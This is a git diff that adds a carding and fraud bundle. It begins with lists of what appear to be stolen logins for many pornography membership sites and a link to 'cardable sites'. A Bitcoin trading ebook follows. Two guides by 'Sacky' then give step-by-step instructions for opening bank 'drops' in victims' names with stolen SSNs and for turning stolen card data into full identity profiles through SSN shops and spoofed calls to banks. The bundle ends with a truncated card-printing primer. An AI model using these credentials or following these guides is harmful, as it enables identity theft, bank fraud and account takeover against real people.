+Muscle Building Mania
+https://mega.nz/#!pcZ01DbB!cfD1bXGPrU9PTiUKISSvwwTCsXfO4DehbmvQzu-SL-o
+-----------------------------------------------------------------------------------------------
+The Write Way to Succeed
+https://mega.nz/#!wZp31JQK!xhNO2qcRtemqRbZwvV65hJmbrZnHJm09nKNY7Tze04M
+-----------------------------------------------------------------------------------------------
+XXX:
+http://members.interracialextreme.com/
+rawpee28 : muOImL3y
+rugbyman : barbie
+epoch11 : epoch12
+
+http://barely18barbie.com/
+S56QaqYNT : ishere2
+iEi9ncMI : iEi9ncMI
+
+http://members.seemyflixxx.com/index.php SeeMyFliXXX
+buettner1967@freenet.de : sebastian
+
+http://www.nastyczechchicks.com/members/
+ncc5jtrnd : ncc4hsdkf
+ncc1heglr : nccp7iedd
+
+http://members.allstarporngirls.com/
+auto13 : tabooo
+supporttest : callcenter1
+
+http://pantyhoseinpublic.com/members/
+cromer12 : b12c12d16j17
+mikeblak : texans29
+
+http://members.euroczgirls.com/
+andi1001 : bettina18
+marlys777 : lodies
+
+http://brokebackasians.com/
+alex300 : rocco7
+Jin1212 : scooby
+
+http://members.hardpornoflix.com/index.php
+25912674 : s2360359
+dabudka : 17891789
+se45085 : 727410
+mthompso : swap42
+colljimmy : adam520
+
+http://members.lordsofporn.com/sblogin/login.php/
+offcrkes : shotgun777
+gx92307084 : gx92307084
+903penisbot : 789penisbot
+contactcenter : occash55
+
+http://www.david-nudes.com/
+aterivbas : muthtartw
+2000charge : football999
+lawnmower41 : davidreviewer
+blinsiesg : guidepoph
+
+http://www.pantyhoseplaza.com/members/
+terry1968 : dylan196
+
+http://www.pleasebangmywife.com
+epcheck : checkep
+redrigo : elfriede
+thebestporn : review
+nctest : password
+
+http://www.cfnmusa.com/members/index.php
+949sanc : silverad
+ballinga : dannyb
+
+10000 cardable sites
+http://www37.zippyshare.com/v/HKtYI3Y9/file.html
diff --git a/BITCOIN_DOMINATION_pdf.md b/BITCOIN_DOMINATION_pdf.md
new file mode 100644
index 0000000..e32ba5c
--- /dev/null
+++ b/BITCOIN_DOMINATION_pdf.md
@@ -0,0 +1,271 @@
+# BITCOIN DOMINATION
+
+
+---
+
+Dominate BTC: How to easily
+rule the market
+|Odin the Wanderer|
+Hello,
+First I would like to thank you for purchasing my ebook. This will help me
+be able to invest more and it will also help pay bills. This is not a magic
+ebook like many others. This ebook will give you information on Bitcoin and
+how to use/invest in it to give maximum return and more profits. Any
+method promises 6 000 000 USD through no work is a lie. I will teach you
+the ins and outs of Bitcoin and hopefully you will (and if you follow this you
+will) earn more money. When though I make this clear in the guide the rule
+of thumb is the following and is imperative to you succeeding.
+- Don’t EVER be complusive
+- Don’t EVER panic sell
+- Don’t EVER believe troll box propaganda
+- Don’t EVER waste money on scam coins/other crypto-coins
+- Don’t ONLY ever have either fiat or crypto
+- Don’t trade on sketchy sites
+- PATIENCE
+- Calm and collected observation
+- Do your own research
+- DON’T buy into pumps and dumps
+I hope you enjoy this ebook!
+------------------------------------------------------------------------------------------------------------
+
+What is Bitcoin?
+Bitcoin is a peer-to-peer payment system and digital currency that is created
+through mining on either a CPU or GPU in which the computer will solve complex
+mathematical problems and algorithms in order to mine a ‘block’. Bitcoin uses
+software known as ‘wallets’ in which through the decentralized system of Bitcoin
+your coins and not counted but tallied, meaning instead of a centralized system
+checking you for a valid number of coins it will view all your transactions (as
+they’re public) and will use these to determine how many Bitcoins you actually
+have. Now you ask why is this information even relevant to speculation? Well, I
+will tell you. This is a philosophical statement, it will and cannot be ever used as
+valid currency due to it’s inherent problems. Yet we can still view this as an
+experiment. The network of Bitcoin is completely decentralized on the basis that
+there is no central bank giving out or generating the coins. This is big, very big.
+This is something people have had always discussed (as banks are viewed as
+corrupt entities, and really, who denies this?) and so people really are interested
+in this. No central bank. Anonymous in the fact anyone can make a wallet with
+ease and never give any information. Etc. This makes people buy into the Bitcoin
+market as they find it’s zeal revolutionary and often it is in alignment with their
+political ideology. What does this tell us exactly? It means that for the time being
+and while the experiment if you will is continuing, people will continue to buy into
+Bitcoin for these reasons ensuring a constant flow. In a way this is like a
+guarantee on your investment if you invest at the right time which I will discuss in
+another section of this ebook. With the understanding of the philosophical and
+political repercussions of Bitcoin you will be better equipped to understand
+Bitcoin.
+------------------------------------------------------------------------------------------------------------
+
+What is speculation?
+Speculation is the practice of engaging in risky financial transactions in an
+attempt to profit from short or medium term fluctuations in the market value of a
+tradable good such as a financial instrument, rather than attempting to profit from
+the underlying financial attributes embodied in the instrument such as capital
+gains, interest, or dividends. (Source: Wikipedia.org). Now what is the difference
+between speculation and investments? It is the margin of risk you are willing to
+shoulder. Investments are usually longer term and are considered generally safe
+choices. But this is for the more traditional type of investment like stocks. We are
+not dealing with a stock, we are dealing with a cryptocurrency which is valued in
+USD. If you are already familiar with Bitcoin you will know that the Bitcoin market
+is very, very volatile and you can make a lot of money or quickly lose everything
+you invested. The type of investments I am going to teach you are ones whom
+are very short term and will yield small profits but at the same time will
+accumulate into a large profit. But we can look at it another way, if we speculate
+Bitcoin we are effectively (as the name implies) inspecting the price of Bitcoin in
+the hopes that it will rise and will give a handsome ROI. Knowing how to
+speculate the price will greatly help you in investing into Bitcoin.
+------------------------------------------------------------------------------------------------------------
+Why bother speculating it?
+This is a great question undoubtably asked by some of you,
+“why bother speculate Bitcoin, isn’t it no different from any other stock?”. The
+Bitcoin market is very volatile, very volatile and it is very rare for anyone to ever
+see this much price fluctuation in a ‘stock’ (to make it simple we’ll consider
+Bitcoin “stock”). In one day Bitcoin can either surge $100 in ‘stock’ price or it can
+lose 50% of it’s value, making this very attractive to those whom like to speculate
+prices. You can turn a lot of profit from speculating it and the market almost
+always corrects itself if you it does lose value, patience will be your friend.
+Because of this it is no wonder why more people are actively speculating Bitcoin
+everyday.
+------------------------------------------------------------------------------------------------------------
+Where to purchase BTC safely?
+
+There are several places in which you can purchase BTC safely. One such place
+I commonly use is VirWox (https://www.virwox.com/). This is the safest and
+fastest way to obtain BTC in my opinion. The way you purchase the BTC is to
+sign up --> login --> under ‘My Account:’ find ‘Deposit’ --> Click that --> You now
+have several options to deposit money (most people have these basic online
+banking businesses such as paypal) --> You then deposit the USD --> Go to
+‘Exchange:’ and you will find ‘USD/SLL’ --> Convert all your USD into SLL
+(Linden Dollars) --> The find ‘BTC/SLL’ --> Then convert all your SLL into BTC -->
+You’re done, you have BTC from using your CC or Paypal from a trusted source.
+The first time you withdraw BTC from the site you’ll have to wait 48 hours for
+security reasons. This is by far the safest and best method I have came across
+unless you wish to use your bank account to transfer funds to an exchange
+(Which I advise against).
+------------------------------------------------------------------------------------------------------------
+Where to exchange?
+My favourite site is BTC-e.com/ru. The rates are the lowest on the market and
+the fees are minimal. There is a great and constant flow of exchanges. This site
+has always been on time with giving out payments with me and I think you would
+like it too. Other exchanges are often corrupt, unsafe, or they don’t allow you to
+withdraw your money like MtGox. It is straight forward to make an account and
+exchange, don’t look at the chat box othewise known as the ‘troll box’ because
+many people there just spread misinformation to make you sell or buy for them to
+make profit and make you lose.
+------------------------------------------------------------------------------------------------------------
+Where to find BTC price graphs/maps?
+I personally use http://bitcoinwisdom.com/markets/btce/btcrur as the place to
+view the current price and rates of BTC with РУБ or USD. This provides you with
+a very nice overview of the latest exchanges and prices of the market. The
+optimal settings I suggest is for each candle to be separated is 15 minutes to see
+the price changes. When you get out and buy in as I will detail later in this ebook
+I will tell you the best settings to view the trends.
+
+When to invest?
+Please look at the graph below to learn when to invest your money into BTC.
+The trick is that the market usually almost always recovers if it crashes, so don’t
+be too cocky and don’t buy in at unusually large prices. However in this market
+and in stocks in general (as well as life) patients will be your greatest asset. Don’t
+compulsively or panic sell, I repeat, NEVER PANIC SELL. Again don’t buy in
+when the price is already at high levels that are not with the current trend of
+
+prices. On BTCwisdom it is encouraged to use the day timer to see the opening
+and closing prices of the day. Making 15 minute trades are not profitable and will
+not help you. You can also to feel safe look at the current news, for example
+China Central Bank debarred people from using virtual currencies such as BTC
+which caused a massive shock in the market that dropped prices and made
+many people lose money due to less exchange volume from China which fueled
+the price to inflate. This is the most crucial step next when to get out, if you need
+help to determine when you buy in or invest please consult me and I can help
+you with pointers.
+------------------------------------------------------------------------------------------------------------
+How to read the graphs?
+If you ever get largely into stock trading or speculation you will see a reoccurring
+and popular graph system to represent value known as the candle stick graph
+system. If you understand it, it will greatly help and you will be undoubtably learn
+how to master the market. The funny thing is that many people don’t know how to
+read these graphs and don’t look at the hints if provides you. This is a folly that
+causes many to lose their money. This is an entire field and I can help you if you
+wish to inquiry more about it- but there are many videos which make it was easy
+to learn and I will link them here so you don’t have to do any searching. (I
+recommend that you take notes from these videos and place them in front of you
+as there are certain patterns that will help you see the direction of the market).
+Candlesticks Vol 1 - Candlestick Design
+http://www.youtube.com/watch?v=k9AlAvYa6MA
+Candlesticks Vol 2 - Candlestick Sentiment
+http://www.youtube.com/watch?v=v2TkJDseG8I
+Candlesticks Vol 3 - Candle Development
+http://www.youtube.com/watch?v=enPN5pIeGMo
+Candlesticks - Vol 4 - Candle Pattern Stages
+http://www.youtube.com/watch?v=r8HRouyRKsg
+
+Candlesticks - Vol 5 - Shooting Star
+http://www.youtube.com/watch?v=mt2_bm2Xy-4
+Candlesticks - Vol 6 - Hanging Man
+http://www.youtube.com/watch?v=_wg_NjFj1gk
+Candlesticks - Vol 7 - Hammer
+http://www.youtube.com/watch?v=wHDgt2HYpnk
+Candlesticks - Vol 8 - Inverted Hammer
+http://www.youtube.com/watch?v=xTP9gQ_6Sjg
+Candlesticks - Vol 9 - Doji
+http://www.youtube.com/watch?v=dWkSRpkU_Os
+Candlesticks - Vol 10 - Harami
+http://www.youtube.com/watch?v=WMwIHgV_FnU
+Candlesticks - Vol 11 - Dark Cloud Cover
+http://www.youtube.com/watch?v=9fJyoez8j7c
+Candlesticks - Vol 12 - Piercing Pattern
+http://www.youtube.com/watch?v=oaZ-BUoSu1s
+Candlestick Charting - Vol 13 - Bearish Engulfing Pattern
+http://www.youtube.com/watch?v=q77CUI8AeHk
+Candlestick Charting - Vol 14 - Bullish Engulfing Pattern
+http://www.youtube.com/watch?v=17V_5Y2rweA
+Candlestick Charting - Vol 15 - Evening Star
+http://www.youtube.com/watch?v=bkfg7icb6J4
+Candlestick Charting - Volume 16 - Morning Star
+http://www.youtube.com/watch?v=hoieLD74QTQ
+
+------------------------------------------------------------------------------------------------------------
+How to use the news to predict the future of the coin
+Like any stock in any market it Bitcoin is also highly influenced by news. It is also
+fairly straight forward and you need not to be an expert on this information. Good
+news usually will mean an increase in price (I.e Country embraces Bitcoin), bad
+news usually will mean a decrease in price (I.e Country bans Bitcoin). It is good
+practice to keep a list of readily available sources for the news. Here are a list of
+news outlets I personally use that are dedicated to Bitcoin related topics.
+A forum that you can give questions or inquiries about Bitcoin to, and also view
+news and happenings. There are many knowledgeable users here.
+https://bitcointalk.org/
+A twitter that gives some news about Bitcoin.
+https://twitter.com/bitcoinnews
+Twitter like site that gives some news about Bitcoin, isn’t always updated
+unfortunately.
+http://www.breakingnews.com/topic/bitcoin/
+Another twitter that is updated almost everyday with an interesting article or
+news.
+https://twitter.com/BTCNews247
+Last but not least reddit. Reddit is one of the largest communities online and has
+a sub-forum dedicated to Bitcoin. This forum has thousands of users and has a
+constant flow of information about Bitcoin added- this is my most used source. It
+also provides some interesting links and funny threads.
+http://www.reddit.com/r/Bitcoin/
+These will give you when combined 24/7 news coverage of Bitcoin related news
+which will be your greatest ally when investing. Remember, when there is bad
+news it does not mean to pull out, sometimes a drop in price is a blessing in
+disguise.
+------------------------------------------------------------------------------------------------------------
+
+When to get out?
+When do you get out? This is a question that many people actually cannot
+answer for you, and I will admit, this will be a task for me. Personally I believe
+that you should be in for the long run- panic selling is very destructive not only to
+your finances but to the market collectively hurting everyone else which will also
+hurt you. I HIGHLY suggest that you have in your exchange account a
+combination of fiat and bitcoin to make sure that you can invest more and pull out
+whenever needed. Make sure to remain calm in the situation and review
+everything. If you need money it is best not to pull out all your Bitcoin into fiat.
+Again, if you need help determining when to do this as every situtation is different
+contact me.
+------------------------------------------------------------------------------------------------------------
+How to exchange BTC with high rates?
+Last but not least there is the time when you have withdrawn your invested
+Bitcoin. Now you could have had converted it into RUR (or USD for my
+Americans) on BTC-e or whatever exchange site you use-- you now have one
+last option to maximize your profits and that includes using the very site you most
+likely got this ebook from: http://www.hackforums.net with this site there is a
+currency exchange that is vibrant and many people use this to exchange. People
+are also desperate for Bitcoin more than any other place I have seen in this
+section which is found here: http://www.hackforums.net/forumdisplay.php?
+fid=182 You will need to make an account if you do not have one and post a
+thread in the section. I will provide a template for you so you do not need to go
+through the troubles of this process.
+Thread title:
+H: Currency you want to exchange N: Currency you’re going to exchange for
+(use the payment processor to tell, I.e PP = Paypal)
+Ie. H: BTC N: PP
+Thread body:
+Привет,
+
+У меня есть «Bitcoin». Я хочу обменять «Bitcoin» для рублях. Вы идете в
+первую очередь. 10% ставка.
+Контакты:
+PM
+XMPP:
+SKYPE
+English:
+Hello,
+I have Bitcoin. I want to exchange Bitcoin for USD. You go first. 10% rate.
+Contacts:
+PM:
+XMPP:
+SKYPE:
+------------------------------------------------------------------------------------------------------------
+Thank you for taking the time to read my ebook, I put a lot of work into this and I
+hope you learned a lot. If you ever have any questions please contact me, I will
+be more than happy to help.
+And if you were wondering, the secret to this ebook is quite simple and elegant:
+Hard work and learning. These are as natural as breathing and I suggest
+everyone take from this.
+Payment and return proofs:
+
+BTC-e proof of my earnings:
+Left overs from my last
+withdraw:
diff --git a/BONUS -BankDrops_pdf.md b/BONUS -BankDrops_pdf.md
new file mode 100644
index 0000000..5713c3d
--- /dev/null
+++ b/BONUS -BankDrops_pdf.md
@@ -0,0 +1,123 @@
+# BONUS -BankDrops
+
+
+---
+
+Bank Drop Creation Tutorial
+By Sacky
+BANK DROPS
+✪ Bank of America ✪
+OPENING:
+Go to http://bankofamerica.com > Banking > Checking > Select your state (use the Fulls state) >
+
+Under I want the Basics click Learn More > Open Now > Choose Bank of America Core
+Checking > Enter all info details (DOB, SSN, Name, Address, etc.) > Choose Unemplyment >
+Do not select
+Coapplicant > At the question Are you adding money to you account now select No, i'll make
+my first deposit after my account is open > Answer the Verify identity questions using the fulls
+information > At the question Would you like a new debit card choose No (you can ask to send it
+to your drop after) > Accept the next terms > Submit application.
+
+IMPORTANT: If you have a drop in US and you want to ship the card to your drop, when
+entering your address, select living less than 6 months on this address and put the real Full
+address after so when you will want to ship the Debit card, you could use it!
+Done! You have an Bank of America account. Now enroll to Online Banking. This should be a
+no brain work. Choose username, password, security questions, image token, etc. All this
+information will be send to your gmail. Now, you are ready to fund and use your BofA account.
+Login to the account and go Paperless! So you wont get any documents in the victims mail as
+that means a burned Bank Drop.
+Connect it to PayPal, Stripe, Square, Flint, etc. but only using the same RDP that you used
+when you created it.
+DEPOSIT:
+1. Buy an American Express Prepaid (if not in US, ask a vendor to do it for you, pay $10 more)
+go to AmericanExpress.com and register it.
+2. For first deposit you can use localbitcoins.com and sell $20$30 BTC for cash deposit/bank
+transfer
+3. Link it to a Paypal (not your own) and deposit from there. (small amounts)
+4. For your new debit card, you can find tons of public information on how to create a drop (if
+you are US based) and if you are not, partner with someone from deep web to use he/she's
+drop and reship it wordwide using a reship service like: http://reship.com
+
+✪ Fidelity ✪
+
+OPENING:
+The same basics as with Bank of America, you will have to have the Credit Report and the
+Background Check and Motor Record opened so you can answer those id verification
+questions.
+So, open http://www.fidelity.com click on Open an Account > Investing and Trading / Brokerage
+
+Account click on Open Online > Individual Account > Are you already a Fidelity customer
+answer is No > Enter Name from fulls and email that you created earlier and click on Get
+Started > Fill the information needed there (DOB+SSN etc) at trades pet year select 035 and
+click next > Answer the id verification question.
+Here you will have some minutes to fill the info, make sure you are precise and quick about it. It
+will be 3 questions and if you answered bad on one you will have another shot on the forth
+question that will popup. Fidelity tends to ask about your victims car and siblings month of birth.
+If you want, card peoplefinder.com and find their birth dates. If you don't pass the questions the
+
+first time you will have a second chance to open the account. Wait for 24 hours and you will get
+an email that will let you know how pleased they are if you will continue your application. It
+happened to me many times and at random times I did not have to answer the questions again
+if I clicked on the link from the mail.
+After you completed the questions you will get a confirmation message, that the account is
+opened and your account number. (starting with X) After this, you will have to agree with
+emailed documents, meaning you will go Paperless. Accept the terms, when asked if you are a
+proffesional or non professional trader, select nonprofessional, don't check the box that's
+talking about you having problems with IRS.
+After this you will be invited to enroll to Online banking, accept, create a username and
+password, select a Security Question and Answer and you are DONE!
+At one point you will be asked if you will use all the time this computer . If you are not sure on
+about your RDP (if you choose not to go with what I recommended) select No, otherwise, select
+Yes and make sure you don't change the RDP/VPS/IP.
+
+DEPOSIT:
+Same as with Bank of America. This will be the same to all of the accounts.
+✪ SunTrust ✪
+OPENING:
+Basically you follow the same steps as with first 3 accounts, the only difference here is that you
+need the issue date for the Driver License. I use a invented one every time and every time it
+works.
+Questions are the same as for Fidelity, so make sure you have the Motor Record open along
+with Credit Record and Background Check. I never used this bank drop to payment processors
+so I can't tell you if it's great or not. It's easy to open it (and this is what this guide is all about)
+but I don't know how it will work with Stripe/Square/etc. I heard different feedbacks on AlphaBay
+forum... so it's up to you if you want to use it for that or you want to use it for loans or cashing
+out Paypals or other stuff. Sometimes they will send the card to your drop automatic, if that
+happens and you dont have a US parter to receive the card, the account is burned. Rinse and
+repeat.
+
+DEPOSIT:
+Same old, same old.
+✪ E*TRADE ✪
+OPENING:
+Click on E*trade bank and then on the right hand you will see "Open Account" on a green
+button. Click it. On the next screen, click on "apply now".
+On the next screen, fill the info bellow "Are You New to E*TRADE?". Remember that, in order to
+fully use this account you will need a US drop as they will mail you the "Welcome Kit". If you
+don't have a drop, and you think you are good enough with english language, you can always
+spoof you phone number and call them, telling them you don't want the "Welcome Kit" to be
+send to your mail because your mother thinks banks are evil and she is old and has some
+mental problems and you don't want to disturb her health. For spoofing numbers, use
+Spooftel.com (i won't get into much here, as there are free info on forums). Create a username
+and a password and click on continue. For this drop you will need to know the driver license
+
+number style to use it for opening it. Enter the address of last employer and when asked for the
+purpose of the account i always choose "Personal family account...". Now, as for all, choose
+individual account and click continue. No Choose E*Trade Checking. Don't accept card right
+now. They will ask you about funding your account. The minimum funding is $100 and you can
+do it as ACH QuickTransfer, an E*TRADE service (you must give the debited account
+number and routing) or wire or check. No matter what you choose for the moment you will be
+able to change it after the account is opened. On the next screen you will have to choose the
+funding amount. Anything north of $100 is ok. Good, now your account is opened. Next step is
+go "Accounts>MyAccounts>Paperless Settings" and choose full paperless.
+The bank will send the card to your address, so it very important to make the account on
+Saturday, chat with them and tell them that you are not in the country for the next 34 weeks.
+They will ask you to call them and tell them that and they should hold the card till you arrive in
+the country. Call them in one day, from a number from any country that you say you are in.
+Keep the background report and credit report open in case they ask anything from inside them.
+(i had no such questions, only about when the account was opened, what type of account, what
+you want to do with it (invest, dooh))
+You should be fine with the account for the next 34 weeks, enought to handle the transactions
+through it.
+DEPOSIT:
+Same old, same old.
diff --git a/BONUS-ConvertCVVintoFULLZ_pdf.md b/BONUS-ConvertCVVintoFULLZ_pdf.md
new file mode 100644
index 0000000..da06d04
--- /dev/null
+++ b/BONUS-ConvertCVVintoFULLZ_pdf.md
@@ -0,0 +1,45 @@
+# BONUS-ConvertCVVintoFULLZ
+
+
+---
+
+How to Convert CVV into FULLZ
+By Sacky
+Okay so many of you buy some credit card infos, but they do not come with DOB or SSN.
+However, there is a way to get them.
+Step 1) Getting the phone number
+If your info does not have the phone number, you should get it. For that, go on
+www.whitepages.com.
+Enter the name of the victim and the zip code. In most of the times, you will get the phone
+number.
+Otherwise, try social media. It can help, but whitepages has a better chance of success.
+Step 2) Getting the DOB and SSN
+There is 1 place where you can get the SSN of your victim. There is a service called Yale
+Lodge, their URL is yale.cm or onion
+yaleshopurdewuubyrmpnhyphkpjmgpurd54dso3s36xtlemrlrhvjad.onion
+There you can enter the name and state of the person, and their DOB and SSN will show. You
+have to pay $19 in bitcoins for each record you buy.
+The site also has a history function that allows you to view your purchases at a later time. Once
+you got the phone number, DOB and SSN, you are good to go. One more step before you buy
+something...
+Step 3) Getting the available balance of the card
+How to make sure your card has a decent balance on it is simple.
+The 6 first digits of the card number are called the BIN (check the wiki for the meaning of
+acronyms).
+So go on www.bindb.com or yale.cm, do a BIN lookup, and you will get the name of the bank.
+So google bank name credit card phone and you will get the phone number of the card service.
+Spoof your caller ID (not required but recommended) and call the bank. Using the automated
+system, you are able to verify the balance of the card.
+They ask questions such as 4 last digits of SSN, zip code, DOB, etc. This is all the info you
+already have, so you can get any balance. Ideal for purchases!
+Step 4) Getting the Mother Maiden Name
+There is no known site that gets this information 100% accurately, but here are a few things you
+can try
+ Card www.ancestry.com to lookup some records
+ Use Facebook (search for account using e-mail address)
+
+ Use social engineering (can backfire if you're not skilled)
+With all of this info, you can card shit more easily. Use these infos in any way that you think will
+benefit you.
+REMEMBER: Be safe!
+-Sacky
diff --git a/Basics_of_Card_Printing_pdf.md b/Basics_of_Card_Printing_pdf.md
new file mode 100644
index 0000000..d229af9
--- /dev/null
+++ b/Basics_of_Card_Printing_pdf.md
@@ -0,0 +1,413 @@
+# Basics of Card Printing
+
+
+---
+
+Basics of Card Printing
+How Card Printers Work
+Printing Process
+Magnetic Stripe Encoding
+Smart Card Encoding
+Card Lamination
+Card Security Features
+Glossary of Terms
+(Source: ID Edge Learning Centre)
+
+How ID card printers work
+The Original Way to Make ID Cards
+Prior to the early 1990s, the most common method of producing an ID card was known as the film-based
+method. This involved taking a person’s photo, cutting it out and laminating it to a card-sized piece of paper
+containing the person’s name, ID number and any other personal information.
+Although the initial investment for a film-based system was relatively low,
+the time, labor and individual cost per card was high. Plus, these cards were easily counterfeited. As a
+result, a new method called digital printing arose during the late 1980s and early 1990s.
+Benefits of Digital Printing
+Image quality
+The image quality of plastic cards produced with digital printing technology is far superior to those produced
+through the traditional manual method described above. The cards look better because digitized photo
+images are sharper and can be edited for color quality. Placement of various graphical elements of the card
+is more consistent and text is clearer and more readable.
+Flexibility
+Plastic card printers can print text, line art and photographic images. They also can encode magnetic stripes
+and provide smart card chip programming contact stations, all in a single-step process. Card design
+software used to produce the cards provides users the flexibility to change designs, store and access
+multiple designs, create variable text fields and implement database programs to store images and track
+information.
+Security
+Plastic card printers also can apply various types of card protection materials to make cards resistant to
+tampering and alteration. These protection materials, including hologram overlays, make cards more secure
+because they cannot be easily reproduced or counterfeited.
+Durability
+Card protection materials such as overlay varnishes, overlaminate patches and secure card media each
+provide various levels of card durability by making the cards resistant to abrasion, UV light exposure, water
+damage and exposure to liquid chemicals.
+Economy
+In-house printing of plastic cards using a digital card printer takes far less time than the old film-based
+method. While the intial capital cost is higher, the cost per card is far less than the old method.
+Convenience
+Printing your own plastic cards gives you the convenience of being able to produce cards when you need
+them, where you need them, letting you issue new cards on demand. Having your own card printer
+capability also makes it easy to make changes to card content or design quickly.
+Printing Process
+Dye Sublimation and Thermal Transfer
+Most plastic card printers feature the same basic printing operations - dye sublimation and/or thermal
+transfer printing. Both techniques involve a ribbon being heated as it passes under a thermal print head.
+The difference is that thermal transfer ribbons heat up and transfer ink onto the plastic card, and dye
+sublimation ribbons heat up and undergo a chemical change process that turns the ink into a gaseous state
+which then permeates the plastic card.
+
+The ribbon used in color dye sublimation printing is divided into three separate color panels: yellow,
+magenta and cyan (see Figure 1). This configuration is referred to as YMC.
+yellow magenta cyan yellow magenta cyan
+These three colors are the primary colors used in printing to
+produce all other colors including black.
+The dye from the ribbon is applied to the plastic card via a multi-pass operation. This means the card will
+pass under the print head once for each of the three colored ribbon panels, applying each color separately.
+The term dye sublimation also is referred to as dye diffusion. When the dye on the ribbon is heated by the
+print head it is transformed from a solid to a gas and diffused onto the plastic card (the card is specially
+coated to absorb the color dye). The hotter the elements in the print head, the more dye is converted to a
+gas and absorbed into the plastic card. At 300 dpi the picture quality and continuous color tones produced
+by a dye sublimation printer outperform most laser or ink jet printers with higher resolutions.
+The advantage of dye sublimation is the millions of colors that can be created. The colors result from a
+combination of the panels on the ribbon. By combining these colors and varying the intensity of the heat,
+providing various shades of each color, you are virtually unlimited in your color selection.
+Thermal transfer differs from dye sublimation in that thermal transfer uses ink rather than dye. Both dye
+sublimation and thermal ink (sometimes refered to as resin) can be combined in one ribbon (see Figure 2).
+This ribbon is referred to as a YMCK ribbon. The letter "K" is the designator for the color black in the printing
+industry.
+yellow magenta cyan black yellow magenta cyan black
+Why do you need a separate black panel, when you can create
+black by mixing the three basic YMC colors together?
+The answer to this question is simple. When black is created by mixing the YMC colors together it creates
+what is referred to as "composite black." Composite black typically looks muddy or has a grayish tint when
+compared to thermal transfer (TT or resin) black. Composite black is not recommended for printing bar
+codes since combining the three colors together does not produce the sharp edge many scanners require
+(this is invisible to the naked eye but can be observed under magnification). Composite black also is invisible
+to IR scanners because there is no carbon in the dye. Since you may not know what type of scanner will be
+used, the rule is to always use TT (resin) black to print bar codes.
+All color printers are capable of printing in monochrome using a single color ribbon. These ribbons are less
+expensive than full-color multi-panel ribbons and can be either dye or ink (thermal transfer). The most
+commonly used monochrome ribbon is black, but there are several other colors available, including red,
+green and blue.
+Monochrome
+Dye sublimation ribbons are preferred when you are printing pictures, because they can produce many
+shades of gray for a smoother look and a better picture quality. A resin black picture normally uses a
+dithered gray scale (gray made from a combination of pixels which limits the number of shades), producing
+a coarser, grainy look to the image.
+
+Thermal transfer (resin) ribbons should be used to print text, bar codes or single color
+graphics such as simple logos. Black monochrome ribbons are represented by the
+letter "K" followed by a lower case "r or d", (Kr or Kd). The "r" designates a thermal
+transfer ribbon with resin ink. The "d" designates a dye sublimation ribbon.
+Reverse transfer
+This process prints images on the reverse side of a retransfer film. The film is then laminated to the face of
+a PVC card with heat and pressure. The process uses the same four color panels as a dye sublimation printer
+but produces much higher quality because the dye bleeds less on the film than it does on a PVC card. Also,
+since the film is laminated to the card it is virtually impossible to tamper with the card without destroying it.
+Inkjet printing
+Inkjet printing has been around for a long time and is common in today's office. However, it has just been
+introduced to ID card printing. Currently, only Fargo has inkjet printers and they require specially
+formulated ink and PVC cards to work.
+There are three main steps to producing a drop with thermal technology. First, the chamber holding the ink
+bubble is heated. Second, the bubble bursts due to heat and the ink drop shoots out of the nozzle. Finally,
+the vacuum from the drop leaving the chamber draws the next bubble into the chamber. There are between
+300 and 600 nozzles per print head, all of which can fire at the same time. "These deliver drop volumes of
+around 8 - 10 [picoliters] (a [picoliter] is a million millionth of a [liter]), and dot sizes of between 50 and 60
+microns in diameter." Thirty microns is the smallest dot size visible to the naked eye.
+There are 300 to 600 of these firing mechanisms per print head. Four to eight of these tiny drops are fired
+onto the paper to make a color dot. Larger dots of 35 picoliters are usually created with black inks. Part of
+this difference is that the colors are usually created with dye-based ink and the black ink is a pigment-based
+ink. Dye-based inks produce a wide range of vibrant colors whereas pigment-based inks are more durable
+and water-resistant. Pigment-based inks also have larger molecules because they are particles suspended in
+solution. Because thermal technology uses heat to create the drop, all the inks used must be heat resistant.
+This narrows the selection of inks and their characteristics such as water-resistance.
+Magnetic Stripe Encoding
+Magnetic stripe cards have been in existence since the early 1970s when they were used on paper and film-
+based ID cards as well as credit cards. Magnetic stripe technology is widely used throughout the world and
+remains the dominant technology in the United States for transaction processing and access control. Other
+technologies such as PDF bar codes and smart chip cards now are capturing part of the magnetic stripe
+market because they can hold more information.
+Magnetic Stripe Plastic Card
+
+Magnetic stripe encoding terms:
+Coercivity
+A technical term used to designate how strong a magnetic field must be to affect data encoded on a
+magnetic stripe. Coercivity is measured in Oersteds (Oe). Coercivity is the measure of how difficult it is to
+encode information in a magnetic stripe.
+HiCo
+Abbreviation for High Coercivity. HiCo magnetic stripes provide the highest level of immunity to damage by
+stray magnetic fields. They are more difficult to encode than LoCo magnetic stripes because the encoding
+requires more power. HiCo magnetic stripe cards are slightly more expensive for this reason.
+LoCo
+Abbreviation for Low Coercivity. Easier to encode and slightly less expensive than HiCo magnetic stripe
+cards.
+ISO Magnetic Stripe Encoding
+International Standards Organization specification for magnetic stripe encoding. The Fargo encoder supports
+dual high/low coercivity and tracks 1, 2 and 3.
+JIS II Magnetic Stripe Encoding
+Japanese Industrial Standard for magnetic stripe encoding; published and translated into English by Japan
+Standards Association.
+Stripe-up/Stripe-down
+Stripe-up means the magnetic stripe is on the front of the card and stripe-down means the magnetic stripe
+is on the back of the card. This information is important when ordering a printer since the magnetic encoder
+must be installed differently for stripe-up and stripe-down models at the factory. The most common is
+stripe-down.
+Select the right type for the job
+Selecting which type of magnetic stripe to adopt depends on how the card is to be used. Will the magnetic
+stripe be used daily, once a month or just a couple of times a year? The chart below shows some of the
+applications where magnetic stripes are used and which stripe is common for that application.
+Applications LoCo HiCo Usage
+Access Control Daily
+Retail Customers Weekly
+Membership Cards Weekly/Monthly
+Time and Attendance Daily
+Debit/Credit International United States weekly/monthly
+Occationally - HiCo
+Driver's Licence
+required by most states
+How to visually identify which kind of stripe is on a card
+The easiest way to determine visually if a stripe on a card is HiCo or LoCo is by the color. HiCo stripes are
+black and LoCo stripes are a lighter brown. Magnetic stripe readers are "blind" as to whether a stripe is HiCo
+or LoCo and are designed to read both.
+
+Smart Card Encoding
+There are a wide variety of contact and contactless smart cards currently in use. The terms "smart chip
+card," "IC card" and "smart card" all refer to the same type of card. Smart cards have a chip embedded in
+them which can be programmed. Smart cards can store more than 100 times more information than a
+magnetic stripe and they can be reprogrammed to add, delete or rearrange data.
+Smart cards were invented in Europe in the 1970s and were in wide use in Western Europe by the early
+'80s. Smart cards are an easy, inexpensive way for European businesses to do offline transaction
+verification. The reason offline verification is preferred is the high cost of telecommunications throughout
+Europe. The United States has been slow to implement smart cards because it would require replacing the
+widely installed magnetic stripe card reading equipment with smart card readers. The cost of having the
